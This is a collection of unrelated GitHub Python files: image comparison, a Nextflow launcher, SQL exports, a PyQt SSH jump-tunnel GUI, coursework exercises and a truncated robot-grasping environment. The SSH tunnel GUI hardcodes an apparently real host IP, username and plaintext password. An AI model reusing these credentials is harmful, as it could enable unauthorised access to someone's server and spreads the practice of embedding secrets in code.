+{"seq_id":"29079953629","text":"from ctypes import sizeof\nfrom operator import length_hint\nfrom PIL import Image\nimport PIL\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport time\n\nskaidinysSize = 10\n\nprint(\"Iveskite 2 nuotraukų lokacijas\")\npath1 = input()\npath2 = input()\nim = Image.open(path1, 'r')\nwidth, height = im.size\npixel_values = list(im.getdata())\n\nim2 = Image.open(path2, 'r')\nwidth2, height2 = im2.size\npixel_values2 = list(im2.getdata())\n\n\ndef getBrightness(pixelValues):\n brightnessArray = []\n\n for x in pixelValues:\n rgbSum = x[0] + x[1] + x[2]\n brightness = rgbSum / 3\n brightnessArray.append(brightness)\n return brightnessArray\n\n\nbrightnessArray = getBrightness(pixel_values)\nbrightnessArray2 = getBrightness(pixel_values2)\n\n\ndef current_milli_time():\n return round(time.time() * 1000)\n\n\ndef showImage(array):\n image_array = np.array(array, dtype=np.uint8)\n img = PIL.Image.fromarray(image_array)\n\n current_time = str(current_milli_time())\n\n img.save(current_time+'.jpg')\n\n\ndef prepareForViewing(brightnessArray):\n l = []\n temp = []\n tempLine = []\n\n h = 0\n while h < height:\n w = 0\n tempLine = []\n while w < width:\n index = h * width + w\n value = round(brightnessArray[index])\n temp = [value, value, value]\n tempLine.append(temp)\n w += 1\n h += 1\n l.append(tempLine)\n\n showImage(l)\n\n\nprepareForViewing(brightnessArray)\nprepareForViewing(brightnessArray2)\n\n\ndef getSkaidinys(brightnessArray):\n l2 = []\n temp2 = []\n tempLine2 = []\n\n h = 0\n while h < height:\n w = 0\n tempLine2 = []\n while w < width:\n index = h * width + w\n\n count = 0\n sum = 0\n\n for i in range(0, skaidinysSize):\n for j in range(0, skaidinysSize):\n count += 1\n sum += brightnessArray[index+j+(width*i)]\n\n rounded =int(sum/count)\n\n temp2 = [rounded, rounded, rounded]\n tempLine2.append(temp2)\n w += skaidinysSize\n h += skaidinysSize\n l2.append(tempLine2)\n\n showImage(l2)\n return l2\n\n\nskaidinys = getSkaidinys(brightnessArray)\nskaidinys2 = getSkaidinys(brightnessArray2)\n\n\ndef findMax(array1, array2):\n maxDiff = 0\n maxDiffX = 0\n\n i = 0\n while i < len(array1):\n if (abs(array1[i]-array2[i]) > maxDiff):\n maxDiff = abs(array1[i]-array2[i])\n maxDiffX = i\n i += 1\n print(\"Maksimalus atsilenkimas tarp funkcijų reikšmių: \", maxDiff)\n if (maxDiffX == 0):\n x = 0\n y = 0\n else:\n x = maxDiffX % (width/skaidinysSize)\n y = maxDiffX//(width/skaidinysSize)\n\n print(\"X: \", x)\n print(\"Y: \", y)\n\n\ndef drawGraph(doubleArray, doubleArray2):\n x = list(range(1, len(doubleArray) * len(doubleArray[0])+1))\n y = []\n for w in doubleArray:\n for h in w:\n y.append(h[0])\n\n # plotting the points\n plt.plot(x, y, label=\"Pirma nuotrauka\")\n # plt.scatter(x, y, label= \"first\", color= \"green\",\n # marker= \".\", s=1)\n\n # line 2 points\n x2 = x\n y2 = []\n\n for w in doubleArray2:\n for h in w:\n y2.append(h[0])\n\n # plotting the line 2 points\n plt.plot(x2, y2, label=\"Antra nuotrauka\")\n # plt.scatter(x2, y2, label= \"second\", color= \"blue\",\n # marker= \".\", s=1)\n\n # naming the x axis\n plt.xlabel('x - skaidiniai')\n # naming the y axis\n plt.ylabel('y - ryškumas')\n # giving a title to my graph\n plt.title('Nuotraukų palyginimo grafikas')\n\n # show a legend on the plot\n plt.legend()\n\n # function to show the plot\n plt.show()\n\n findMax(y, y2)\n\n\n# pip install matplotlib\ndrawGraph(skaidinys, skaidinys2)\n","repo_name":"KerniusB/matanas","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"35636645654","text":"#!/usr/bin/env python3\n\nimport os\nimport sys\nimport glob\nimport time\nimport argparse\nimport yaml\nimport json\nimport subprocess\n\n\n# configuration to be used when no config file exists in the batch dir\nDEFAULT_CONFIG = {\n 'max_parallel_runs': 3,\n 'resume_failed_run': False,\n 'nextflow_config': '/home/ubuntu/testing/argo-alignment-test-run/nextflow.config',\n 'workflow_version': '1.5.5',\n 'profile': 'slurm_docker',\n 'reverse_order': False,\n 'remove_input_bam': False\n}\n\n\ndef get_config(batch_dir):\n # name of the config file: settings.conf, file format: YAML\n conf_file = os.path.join(batch_dir, 'settings.conf')\n\n if os.path.isfile(conf_file):\n with open(os.path.join(batch_dir, 'settings.conf')) as f:\n config = yaml.safe_load(f)\n else:\n config = DEFAULT_CONFIG\n\n return config\n\n\ndef cleanup(job_dir, config):\n if config.get('remove_input_bam'):\n job_file = os.path.join(job_dir, '%s.nf-job.json' % os.path.basename(job_dir))\n with open(job_file, 'r') as j:\n job = json.load(j)\n for bam in job['sequencing_files']:\n if os.path.exists(os.path.realpath(os.path.join(job_dir, bam))):\n print(\"remove input bam: %s\" % os.path.realpath(os.path.join(job_dir, bam)))\n os.remove(os.path.realpath(os.path.join(job_dir, bam)))\n\n\ndef get_job_summary(batch_dir, config=DEFAULT_CONFIG):\n # go through the job dirs\n job_summary = {\n 'new': [],\n 'completed': [],\n 'running': [],\n 'failed': []\n }\n\n job_dirs = sorted(glob.glob(os.path.join(batch_dir, '*')))\n if config.get('reverse_order'):\n job_dirs = sorted(job_dirs, reverse=True)\n\n for job_dir in job_dirs:\n if not os.path.isdir(job_dir): # skip if not dir\n continue\n\n job_file = os.path.join(job_dir, '%s.nf-job.json' % os.path.basename(job_dir))\n if not os.path.isfile(job_file): # skip if no job json\n continue\n\n trace_file = os.path.join(job_dir, 'trace.txt')\n stdout_file = os.path.join(job_dir, 'stdout')\n # the logic below for different job status can be improved\n if os.path.isfile(stdout_file):\n # if 'stdout' exists but 'trace.txt' does not, the job has already been launched\n # it's in running state, but just not scheduled by slurm or have not got the time\n # to generate the 'trace.txt' file\n if not os.path.isfile(trace_file):\n job_summary['running'].append({\n 'job_dir': job_dir\n })\n\n else: # now both trace.txt and stdout exist\n trace_lines = []\n with open(trace_file, 'r') as f:\n trace_lines = f.read().split('\\n')\n trace_lines = trace_lines[:-1] # remove the last line which is empty \n\n stdout_lines = []\n with open(stdout_file, 'r') as f:\n stdout_lines = f.read().split('\\n')\n\n completed_in_stdout = False\n for stdout_line in reversed(stdout_lines): # loop backwards\n if 'process > DnaAln:cleanup' in stdout_line and '[100%] 1 of 1' in stdout_line:\n completed_in_stdout = True\n\n # we are conservative to call a run is completed, so require confirmation\n # from both trace and stdout\n if 'DnaAln:cleanup' == trace_lines[-1].split('\\t')[3] and \\\n 'COMPLETED' == trace_lines[-1].split('\\t')[4] and \\\n completed_in_stdout:\n job_summary['completed'].append({\n 'job_dir': job_dir\n })\n\n # cleanup the input BAM to free more space\n cleanup(job_dir, config)\n\n else: # now either running or failed\n status = 'running' # assume running\n for trace_line in trace_lines:\n if trace_line.startswith('task_id'):\n continue\n\n cols = trace_line.split('\\t')\n if cols[4] == 'FAILED' or cols[4] == 'ABORTED': # treat the two same way\n status = 'failed'\n break\n\n job_summary[status].append({\n 'job_dir': job_dir\n })\n\n else: # no stdout file, it's new job\n job_summary['new'].append({\n 'job_dir': job_dir\n })\n\n return job_summary\n\n\ndef launch_job(job, config=DEFAULT_CONFIG, resume=False, launch=False):\n job_dir = job['job_dir']\n job_file = os.path.join(job_dir, '%s.nf-job.json' % os.path.basename(job_dir))\n if not os.path.isfile(job_file):\n raise Exception('Nextflow job JSON file not found under: %s' % job_dir)\n\n launch_command = 'cd %s && nextflow -C %s run icgc-argo/dna-seq-processing-wfs -r %s -params-file %s ' % \\\n (job_dir, config['nextflow_config'], config['workflow_version'], os.path.basename(job_file)) + \\\n '-profile %s -queue-size %s ' % (config['profile'], \"2\") + \\\n '-with-report -with-trace %s' % ('-resume ' if resume else '')\n\n launch_command += '2> stderr > stdout'\n\n if launch:\n time.sleep(8) # sleep 8 seconds to avoid launching runs too close to each other\n system_call = subprocess.Popen(launch_command, shell=True)\n print('Launched run: %s' % job_file, file=sys.stderr)\n else:\n print('Launch flag (-l) not set. Otherwise, would have launched a run with command: %s' % launch_command, file=sys.stderr)\n\n\ndef main(batch_dir=None, launch=False):\n config = get_config(batch_dir)\n\n job_summary = get_job_summary(batch_dir, config=config)\n # print(json.dumps(job_summary))\n print(\"Job status, new: %s, running: %s, completed: %s, failed: %s\" % (\n len(job_summary['new']), len(job_summary['running']), len(job_summary['completed']), len(job_summary['failed'])\n ))\n\n available_run_slots = config['max_parallel_runs'] - len(job_summary['running'])\n\n if available_run_slots > 0:\n if config['resume_failed_run']: # resume failed jobs first if resume set to true\n for job in job_summary['failed']:\n launch_job(job, config, resume=True, launch=launch)\n available_run_slots -= 1\n\n if available_run_slots == 0:\n break\n\n # still have run slots, then launch new jobs\n if available_run_slots > 0:\n for job in job_summary['new']:\n launch_job(job, config, resume=False, launch=launch)\n available_run_slots -= 1\n\n if available_run_slots == 0:\n break\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Nextflow run monitor and launcher')\n parser.add_argument('-d', dest='batch_dir', required=True, help='A directory containing all job folders in one batch')\n parser.add_argument('-l', dest='launch', action='store_true', help='Flag for actual launch, otherwise informational only')\n args = parser.parse_args()\n\n main(batch_dir=args.batch_dir, launch=args.launch)\n\n","repo_name":"icgc-argo-workflows/metadata-for-benchmarking-datasets","sub_path":"scripts/nf-launcher.py","file_name":"nf-launcher.py","file_ext":"py","file_size_in_byte":7318,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"20867811340","text":"import csv\nimport sqlite3\ndBase = \"database.db\"\nconn = sqlite3.connect(\"database.db\")\n'''\nresult1 = conn.execute(\n \"SELECT mov.Budget, mov.Nconst, history.Nconst, mov.User_Rating, mov.Tconst, history.Tconst, history.User_Rating from (SELECT M.User_Rating, H.Nconst, M.Tconst, M.Budget FROM MOVIE as M, DIRECTED_BY as H WHERE M.Tconst = H.Tconst and H.Nconst NOT LIKE \\\"\\\\N\\\") as mov JOIN (SELECT H.Nconst, M.Tconst, M.User_Rating FROM MOVIE as M, DIRECTED_BY as H WHERE M.Tconst = H.Tconst and H.Nconst NOT LIKE \\\"\\\\N\\\") as history on history.Nconst = mov.Nconst WHERE move.Budget IS NOT NULL ORDER BY mov.Nconst;\")\n\nwith open('question1.csv', 'w') as csvfile:\n write = csv.writer(csvfile, delimiter = ' ', quotechar = '|', quoting = csv.QUOTE_MINIMAL)\n for i in result1.fetchall():\n i = list(i)\n print(i)\n write.writerow(i)\n\nresult2 = conn.execute(\"SELECT M.Act_1_Likes, M.Act_2_Likes, M.Act_3_Likes, M.Face_number, M.Revenue FROM MOVIE as M WHERE Act_3_Likes and Act_2_Likes and Act_1_Likes and Revenue and Face_number is not null;\")\n\nwith open('question2.csv', 'w') as csvfile:\n write = csv.writer(csvfile, delimiter = ' ', quotechar = '|', quoting = csv.QUOTE_MINIMAL)\n for i in result2.fetchall():\n i = list(i)\n print(i)\n write.writerow(i)\n\nresult3 = conn.execute(\"SELECT M.User_Rating, M.Critic_Rating, M.Revenue FROM MOVIE as M WHERE User_Rating and Critic_Rating and Revenue is not null;\")\n\nwith open('question3.csv', 'w') as csvfile:\n write = csv.writer(csvfile, delimiter = ' ', quotechar = '|', quoting = csv.QUOTE_MINIMAL)\n for i in result3.fetchall():\n i = list(i)\n print(i)\n write.writerow(i)\n'''\nresult4 = conn.execute(\"SELECT M.Act_1_Likes, M.Act_2_Likes, M.Act_3_Likes, M.Director_Likes, M.Revenue, M.Budget FROM MOVIE as M WHERE Revenue and Act_1_Likes and Act_2_Likes and Act_3_Likes is NOT NULL ;\")\nwith open('question4.csv', 'w') as csvfile:\n write = csv.writer(csvfile, delimiter = ' ', quotechar = '|', quoting = csv.QUOTE_MINIMAL)\n for i in result4.fetchall():\n i = list(i)\n print(i)\n write.writerow(i)\n\nresult5 = conn.execute(\"SELECT epi.Rating, sea.SeasonR, epi.Econst, sea.Tconst from( SELECT E.Econst, S.Tconst as SeasonT, R.Avg_Rating as Rating FROM EPISODE as E, SEASON as S, HAS_EPISODE as H, RATINGS as R WHERE E.Econst = H.Econst and S.Tconst = H.Season_Tconst and E.Econst = R.Tconst ) as epi JOIN ( SELECT S.Tconst, R.Avg_Rating as SeasonR FROM SEASON as S, RATINGS as R WHERE S.Tconst = R.Tconst ) as sea on epi.SeasonT = sea.Tconst ORDER BY sea.Tconst;\")\n\nwith open('question5.csv', 'w') as csvfile:\n write = csv.writer(csvfile, delimiter = ' ', quotechar = '|', quoting = csv.QUOTE_MINIMAL)\n for i in result5.fetchall():\n i = list(i)\n print(i)\n write.writerow(i)\n\nconn.close()","repo_name":"ballcarsen/Database-science-Project","sub_path":"ProjectCode/Query.py","file_name":"Query.py","file_ext":"py","file_size_in_byte":2856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"8336941246","text":"from cmd import Cmd\r\nimport os\r\nimport sys\r\nfrom class_kernel import *\r\n\r\nclass CommandParser:\r\n def __init__(self, class_style):\r\n print(class_style.green(\"[OK] \") + class_style.yellow(\"Command Parser Loaded\"))\r\n\r\n def parse(self, command):\r\n return command\r\n\r\n\r\nclass CommandLine(Cmd):\r\n def __init__(self,class_style,kernel):\r\n Cmd.__init__(self)\r\n self.doc_header = \"Documented commands (type help ):\"\r\n self.misc_header = \"Miscellaneous help topics:\"\r\n self.undoc_header = \"Undocumented commands:\"\r\n self.__Style=class_style\r\n self.__Kernel=kernel\r\n self.prompt = self.__Kernel.get_name() + \"@\" + self.__Kernel.get_env() + \"~# \"\r\n self.__Kernel.set_name(\"HELLO\")\r\n\r\n def do_change(self, line):\r\n print(\"HE\")\r\n def do_help(self, arg):\r\n 'List available commands with \"help\" or detailed help with \"help cmd\".'\r\n if arg:\r\n # XXX check arg syntax\r\n try:\r\n func = getattr(self, 'help_' + arg)\r\n except AttributeError:\r\n try:\r\n doc=getattr(self, 'do_' + arg).__doc__\r\n if doc:\r\n self.stdout.write(\"%s\\n\"%str(doc))\r\n return\r\n except AttributeError:\r\n pass\r\n self.stdout.write(\"%s\\n\"%str(self.nohelp % (arg,)))\r\n return\r\n func()\r\n else:\r\n names = self.get_names()\r\n cmds_doc = []\r\n cmds_undoc = []\r\n help = {}\r\n for name in names:\r\n if name[:5] == 'help_':\r\n help[name[5:]]=1\r\n names.sort()\r\n # There can be duplicates if routines overridden\r\n prevname = ''\r\n for name in names:\r\n if name[:3] == 'do_':\r\n if name == prevname:\r\n continue\r\n prevname = name\r\n cmd=name[3:]\r\n if cmd in help:\r\n cmds_doc.append(cmd)\r\n del help[cmd]\r\n elif getattr(self, name).__doc__:\r\n cmds_doc.append(cmd)\r\n else:\r\n cmds_undoc.append(cmd)\r\n self.stdout.write(\"%s\\n\"%str(self.doc_leader))\r\n self.print_topics(self.__Style.red(self.doc_header), cmds_doc, 15,80)\r\n self.print_topics(self.misc_header, help.keys(),15,80)\r\n self.print_topics(self.undoc_header, cmds_undoc, 15,80)","repo_name":"xingboyu1/Xtoolkit","sub_path":"class_command_line.py","file_name":"class_command_line.py","file_ext":"py","file_size_in_byte":2619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"14366242624","text":"\nfrom rtiCUDA import rcarray\nfrom rtiCUDA import messageSender\nimport numpy as np\nimport time\nimport math\n\nk=3\n\nif __name__=='__main__':\n messageSender.connect(\"andrej\")\n start = time.perf_counter()\n ars1 = []\n ars2 = []\n for i in range(k):\n ar1 = rcarray.makeRcArray(\"int\",[k],1)\n ars1.append(ar1)\n ar2 = rcarray.makeRcArray(\"int\",[k],1)\n ars2.append(ar2)\n ar3 = rcarray.makeMatrix(\"int\",ars1,k)\n ar6 = rcarray.makeMatrix(\"int\",ars2,k)\n #print(ar3)\n #print(ar6)\n start = time.perf_counter()\n ar7 = rcarray.dot(ar3,ar6)\n p = rcarray.sum(ar7)\n end = time.perf_counter()\n print(p)\n print(end-start)\n\n np1 = np.ones((k,k))\n np2 = np.ones((k,k))\n #print(ar7)\n start = time.perf_counter()\n\n np3 = np.matmul(np1, np2)\n s=np.sum(np3)\n end = time.perf_counter()\n print(s)\n print(end-start)\n\n messageSender.disconnect()","repo_name":"andrejjakovljevic/Bachelor-s","sub_path":"rtiCUDA/tests/help_test.py","file_name":"help_test.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"37027184726","text":"import random\nclass Product:\n \n def __init__(self, c, n, s, p, m, e, ):\n self.code=int(c)\n self.name=str(n)\n self.stock=int(s)\n self.price=int(p)\n self.manufac=int(m)\n self.emu=int(e)\n \n\n def display(self):\n print(\"******Programing Principles Sample Stock Statement*****\")\n print(\"Product Code: \", self.code)\n print(\"Product Name: \", self.name)\n print(\"Sale Price: \", self.price)\n print(\"Manufacture Cost: \", self.manufac)\n print(\"Monthly Production: \", self.emu, \"(Approx.)\")\n\n #def months(self):\n \n #intr = random.randint(-10,10)\n \n #print(\"Month 1: \")\n #print(\"- Manufactured: \", self.emu)\n #print(\"- Sold: \", self.emu + )\n #print(\"- Stock: \", self.emu + )\n \n\nprint(\"Welcome to Programming Principles Sample Product Inventory\")\nprod_instance = Product(input(\"Please enter the Product Code: \"), input(\"Please enter the Product Name: \"), \n input(\"Please enter the Current Stock: \"), input(\"Please enter the Product Sale Price: \"),\n input(\"Please enter the Product Manufacture Cost: \"), (input(\"Please enter estimated monthly production: \")))\n\nprod_instance.display()\n\nprod_instance.months()\n","repo_name":"Julian-Barbachano/2023-Assignment--2","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"1446094611","text":"import sys\nfrom PyQt5.QtGui import QPixmap,QPalette\nfrom PyQt5 import QtCore,QtWidgets\nfrom PyQt5.QtWidgets import QWidget,QInputDialog,QMainWindow,QDialog,QLabel,QLineEdit,QGridLayout, QToolTip,QPushButton, QApplication\nfrom jumps.Jump_Tunnel import Jump_Tunnel\nfrom PyQt5.QtCore import Qt\nimport click\nimport time\nimport logging\nimport threading\n\njumphost = '117.48.195.186'\njumpport = 2222\njumpuser = 'dm'\njumppwd = 'Vts^pztbvE339@Rw'\ntunnelhost = '172.16.16.32'\ntunnelappport = 10000\nlocalhost = '127.0.0.1'\nlocalbindport = 4800\ndaemonsecond=2000\nlogger = logging.getLogger('ssh-jump-hive-gui')\nclass JumpTunnel(QWidget):\n\n def __init__(self):\n super().__init__()\n self.my_UI(True)\n def my_UI(self,test=False):\n jhLabel=QLabel(\"JumpHost:\")\n jpLabel=QLabel(\"JumpPort:\")\n juLable=QLabel(\"JumpUser:\")\n jpwdLabel=QLabel(\"JumpPwd:\")\n thLabel=QLabel(\"TunnelHost:\")\n tpLabel=QLabel(\"TunnelPort:\")\n lhLabel=QLabel(\"LocalHost:\")\n lpLabel=QLabel(\"LocalPort:\")\n gitLabel = QLabel(\"GithubRepo:\")\n dtLabel=QLabel(\"DaemonSecond:\")\n if test==True:\n self.jumpHost=QLineEdit(\"117.48.195.186\")\n self.jumpPwd=QLineEdit(\"Vts^pztbvE339@Rw\")\n self.tunnelHost=QLineEdit(\"172.16.16.32\")\n else:\n self.jumpHost = QLineEdit()\n self.jumpPwd = QLineEdit()\n self.tunnelHost = QLineEdit()\n self.jumpPort = QLineEdit(\"2222\")\n self.jumpUser = QLineEdit(\"dm\")\n self.tunnelPort=QLineEdit(\"10000\")\n self.localHost=QLineEdit(\"127.0.0.1\")\n self.localPort=QLineEdit(\"3560\")\n self.daemonSecond=QLineEdit(\"21600\")\n github=QLineEdit(\"https://github.com/mullerhai/sshjumphive\")\n self.btnConn = QPushButton(\"Trun ON\", self)\n self.btnClose=QPushButton(\"Trun Off\",self)\n self.grid=QGridLayout()\n self.grid.setSpacing(10)\n self.grid.addWidget(jhLabel,2,0)\n self.grid.addWidget(self.jumpHost,2,1)\n self.grid.addWidget(jpLabel,2,2)\n self.grid.addWidget(self.jumpPort,2,3)\n self.grid.addWidget(juLable,3,0)\n self.grid.addWidget(self.jumpUser,3,1)\n self.grid.addWidget(jpwdLabel,3,2)\n self.grid.addWidget(self.jumpPwd,3,3)\n self.grid.addWidget(thLabel,5,0)\n self.grid.addWidget(self.tunnelHost,5,1)\n self.grid.addWidget(tpLabel,5,2)\n self.grid.addWidget(self.tunnelPort,5,3)\n self.grid.addWidget(lhLabel,7,0)\n self.grid.addWidget(self.localHost,7,1)\n self.grid.addWidget(lpLabel,7,2)\n self.grid.addWidget(self.localPort,7,3)\n self.grid.addWidget(gitLabel,8,0)\n self.grid.addWidget(github,8,1)\n self.grid.addWidget(dtLabel,8,2)\n self.grid.addWidget(self.daemonSecond,8,3)\n self.grid.addWidget(self.btnConn,9,0)\n self.grid.addWidget(self.btnClose,9,3)\n pixmap = QPixmap(\"../img/guilogo.jpg\")\n pixmap=pixmap.scaledToHeight(80)\n pixmap=pixmap.scaledToWidth(180)\n lbl = QLabel(self)\n lbl.setFixedHeight(80)\n lbl.setFixedWidth(180)\n lbl.setPixmap(pixmap)\n self.grid.addWidget(lbl,10,1)\n pixfox = QPixmap(\"../img/tunnel.jpg\")\n pixfox=pixfox.scaledToHeight(90)\n pixfox=pixfox.scaledToWidth(90)\n lblfox = QLabel(self)\n lblfox.setFixedHeight(90)\n lblfox.setFixedWidth(90)\n lblfox.setPixmap(pixfox)\n self.grid.addWidget(lblfox,10,2)\n self.btnConn.clicked.connect(self.buttonClicked)\n self.btnClose.clicked.connect(self.btnCloseSession)\n self.setLayout(self.grid)\n self.setWindowTitle('SSH-Jump-Hive')\n self.setGeometry(300, 300, 490, 450)\n self.show()\n\n def btnCloseSession(self):\n # text, ok = QInputDialog.getText(self, 'Turn Off',\n # 'Please Input 1 then Trun off tunnel :')\n # logging.warn(msg=\"Will kill recently ssh tunnle process\")\n # if ok and text=='1':\n try:\n self.jump_tunnel.client.close()\n logging.info(msg=\"ssh_tunnel turn off successfully\")\n sucTLabel = QLabel(\"turn off Success\")\n self.grid.addWidget(sucTLabel, 9, 1)\n # text, ok = QInputDialog.getText(self, 'Success',\n # 'ssh_tunnel turn off successfully close dialog ok')\n except:\n failedTLabel = QLabel(\"turn off be Failed\")\n self.grid.addWidget(failedTLabel, 9, 2)\n # text, ok = QInputDialog.getText(self, 'Failed',\n # 'ssh_tunnel turn off failed check the config')\n logging.error(msg=\"ssh_tunnel turn off failed,please try again\")\n # else:\n # failedTLabel = QLabel(\"turn off Failed\")\n # self.grid.addWidget(failedTLabel, 9, 2)\n # text, ok = QInputDialog.getText(self, 'Failed',\n # 'ssh_tunnel turn off failed check the config')\n def buttonClicked(self): # 在buttonClikced()方法中,我们调用sender()方法来判断哪一个按钮是我们按下的\n jumphost=self.jumpHost.text().strip()\n jumpuser=self.jumpUser.text().strip()\n jumppwd=self.jumpPwd.text().strip()\n tunnelhost=self.tunnelHost.text().strip()\n localhost=self.localHost.text().strip()\n\n logging.info(msg=self.jumpHost.text()+\"%%\"+self.jumpUser.text()+\"%%\"+self.jumpPwd.text())\n try:\n jumpport = (int(self.jumpPort.text().strip()) if self.jumpPort.text().strip() != None else 2222)\n tunnelappport = (int(self.tunnelPort.text().strip()) if self.tunnelPort.text().strip() != None else 10000)\n localbindport = (int(self.localPort.text().strip()) if self.localPort.text().strip() != None else 4320)\n daemonsecond = (int(self.daemonSecond.text().strip()) if self.daemonSecond.text().strip() != None else 21600)\n\n self.jump_tunnel=Jump_Tunnel(jumphost,jumpport,jumpuser,jumppwd,tunnelhost,tunnelappport,localhost,localbindport)\n tunnel_conn=self.jump_tunnel.jump_con_tunnel()\n\n with tunnel_conn:\n #time.sleep(0.1)\n logging.info(msg=\"启动成功\")\n sucLabel = QLabel(\"Connect Success\")\n self.grid.addWidget(sucLabel, 9, 2)\n # pe = QPalette()\n # pe.setColor(QPalette.WindowText, Qt.red)\n #sucLabel.setAutoFillBackground(pe)\n\n text, ok = QInputDialog.getText(self, 'Success',\n 'connect ssh tunnel successfully close dialog ok')\n time.sleep(daemonsecond)\n except:\n logging.info(msg=\"启动失败\")\n failedLabel=QLabel(\"Connect Failed\")\n self.grid.addWidget(sucLabel, 9, 2)\n # text, ok = QInputDialog.getText(self, 'Failed',\n # 'connect ssh tunnel failed check the config')\n\n #sender = self.sender()\n # self.showMessage(sender.text() + ' 是发送者')\n\ndef main():\n app = QApplication(sys.argv)\n jtGui = JumpTunnel()\n sys.exit(app.exec_())\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = JumpTunnel()\n sys.exit(app.exec_())\n","repo_name":"mullerhai/sshjumphive","sub_path":"jumps/jump_gui.py","file_name":"jump_gui.py","file_ext":"py","file_size_in_byte":6564,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"69"}
+{"seq_id":"7392353128","text":"states = [\n {\n \"state\":\"New Jersey\",\n \"capital\": \"Trenton\",\n \"continent\": \"North America\"\n },\n {\n \"state\":\"New York\",\n \"capital\": \"Albany\",\n \"continent\": \"North America\"\n },\n {\n \"state\":\"Pennsylvania\",\n \"capital\": \"Harrisburg\",\n \"continent\": \"North America\"\n },\n {\n \"state\":\"Wisconsin\",\n \"capital\": \"Madison\",\n \"continent\": \"North America\"\n }\n]\nprint(states[-1][\"capital\"])\n\n\ncountries = [\n\t{\n\t\t'country': 'South Africa',\n\t\t'capital': 'Pretoria',\n\t\t'continent': 'Africa'\n\t},\n\t{\n\t\t'country': 'USA',\n\t\t'capital': 'Washington DC',\n\t\t'continent': 'North America'\n\t},\n\t{\n\t\t'country': 'Panama',\n\t\t'capital': 'Panama City',\n\t\t'continent': 'North America'\n\t},\n\t{\n\t\t'country': 'Israel',\n\t\t'capital': 'Jerusalem',\n\t\t'continent': 'Asia'\n\t},\n\t{\n\t\t'country': 'Palestine',\n\t\t'capital': 'Al Quds',\n\t\t'continent': 'Asia'\n\t}\n]\n\nnumber_of_continents = set()\nfor country in countries:\n number_of_continents.add((country[\"continent\"]))\n\nprint(f\"Number of continents is: {len(number_of_continents)}\")\n\n\n\n# sampleDict = { \n# \"class\":{ \n# \"student\":{ \n# \"name\":\"Mike\",\n# \"marks\":{ \n# \"physics\":70,\n# \"history\":80\n# }\n# }\n# }\n# }\n\nsampleDict = {\n \"name\": \"Kelly\",\n \"age\":25,\n \"salary\": 8000,\n \"city\": \"New york\"\n\n}\nkeysToRemove = [\"name\", \"salary\"]\nfor key in keysToRemove:\n del sampleDict[key]\nprint(sampleDict)\n\n\n\n# Hashtable\nnames = [\"jon\", \"jackie\", \"gabi\", \"dennis\", \"kobe\"]\nphonebook = {}\nfor name in names:\n key = name[0].upper()\n if key not in phonebook:\n phonebook[key] = [name]\n else:\n phonebook[key].append(name)\nprint(phonebook)\n\n# letter_lookup = {name[0].upper() : name for name in names}\n# print(letter_lookup)","repo_name":"jacprez/developers.institute","sub_path":"Week 4/Day 3/Class Exercises/class.py","file_name":"class.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"29162001321","text":"import glob\nimport os\nimport random\nfrom abc import ABC, abstractmethod\n\nimport cv2\nimport gymnasium\nimport numpy as np\nimport pybullet as p\nimport pybullet_data as pd\nfrom agent import Kuka\nfrom gymnasium import spaces\nfrom gymnasium.utils import seeding\n\n\nclass KukaGraspEnvFramework(\n gymnasium.Env,\n ABC,\n):\n \"\"\"Kuka robotic arm grasp envs' framework.\"\"\"\n\n def __init__(\n self,\n render=True,\n is_test=False,\n block_random=0.2,\n dv=0.1,\n max_step=10,\n camera_random=0,\n width=128,\n height=128,\n show_image=False,\n use_depth_image=False,\n ):\n \"\"\"Initializes the KukaDiverseObjectEnv.\n\n Args:\n renders: If true, render the bullet GUI.\n is_test: If true, use the test set of objects. If false, use the train\n set of objects.\n block_random: A float between 0 and 1 indicated block randomness. 0 is\n deterministic.\n dv: The velocity along each dimension for each action.\n max_step: The maximum number of actions per episode.\n camera_random: A float between 0 and 1 indicating camera placement\n randomness. 0 is deterministic.\n width: The image width.\n height: The observation image height.\n num_objects: The number of objects in the bin.\n show_image:\n use_depth_image:\n\n \"\"\"\n super(KukaGraspEnvFramework, self).__init__()\n self.urdf_root = pd.getDataPath() # << pybullet自带的urdf文件路径\n self.time_step = 1.0 / 240 # << 每一步的仿真时间\n self.env_step = 0\n self.is_test = is_test\n self.max_force = 500\n self.max_velocity = 0.25\n self.block_random = block_random\n self.dv = dv\n self.camera_random = camera_random\n self.width = width\n self.height = height\n self.vision_servo = False\n self.use_depth_image = use_depth_image\n self.max_step = max_step\n self.show_image = show_image\n # several parameters\n self.action_apply_time = 500\n self.successful_grasp_times = 0 # << 抓取成功次数\n self.total_grasp_times = 0 # << 尝试抓取次数\n\n # connect the physics engine\n if render:\n self.cid = p.connect(p.SHARED_MEMORY)\n if self.cid < 0:\n self.cid = p.connect(p.GUI)\n # set God view 上帝视角\n p.resetDebugVisualizerCamera(\n cameraDistance=1.3,\n cameraYaw=180,\n cameraPitch=-41,\n cameraTargetPosition=[0.52, -0.2, -0.33],\n )\n else:\n self.cid = p.connect(p.DIRECT)\n self.seed()\n ########################################################################\n # observation spaces\n ########################################################################\n if self.use_depth_image:\n pass\n else:\n self.observation_space = spaces.Box(\n low=0, high=1, shape=(3, self.height, self.width), dtype=np.float32\n )\n\n @abstractmethod\n def reset(self):\n \"\"\"please implement in subclass\"\"\"\n\n def env_reset(self):\n ########################################################################\n # set the environment of pybullet\n ########################################################################\n 